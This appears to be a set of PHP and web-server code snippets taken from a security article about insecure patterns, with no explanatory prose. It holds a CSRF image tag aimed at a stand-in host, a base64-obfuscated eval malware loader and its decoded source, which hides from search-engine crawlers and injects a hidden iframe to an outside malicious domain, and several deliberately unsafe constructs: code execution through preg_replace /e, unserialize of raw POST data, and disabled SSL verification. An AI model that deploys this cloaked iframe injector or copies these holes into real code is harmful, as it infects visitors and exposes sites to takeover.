location ~ \.php$ {
include /etc/nginx/fastcgi_params;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /var/www/public_html$fastcgi_script_name;
}
<img src="http://hacker.com/vote/30">
if (authenticated_user()) {
$authorized = true;
}
if ($authorized) {
include "/highly/sensitive/data.php”;
}
<?php
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZ
BTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IG
FycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjc
mF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21v
JywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbSc
sJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2
xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c
2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6
enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2x
zJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldH
NlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJyc
nJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywn
ZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd
2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2
UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ
3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xv
ZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF
5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMj
M5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wI
iAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFyc...'));
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter =
array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>';
}
preg_replace( '/.*/e', $_POST['code'] );
create_function( ‘$y', $some_string );
include( $some_file . ‘.php’ );
file_get_contents( ‘https://mysecuresite.com/auth.php’ );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, FALSE );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, FALSE );
filter_var( ‘javascript://supergoodstuff%0Aalert(1)‘, FILTER_VALIDATE_URL );
<?php
if ( ! isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}
ob_start();
$data = base64_decode( $HTTP_RAW_POST_DATA );
if ( $data ) {
$unserialized_data = @unserialize( $data );
}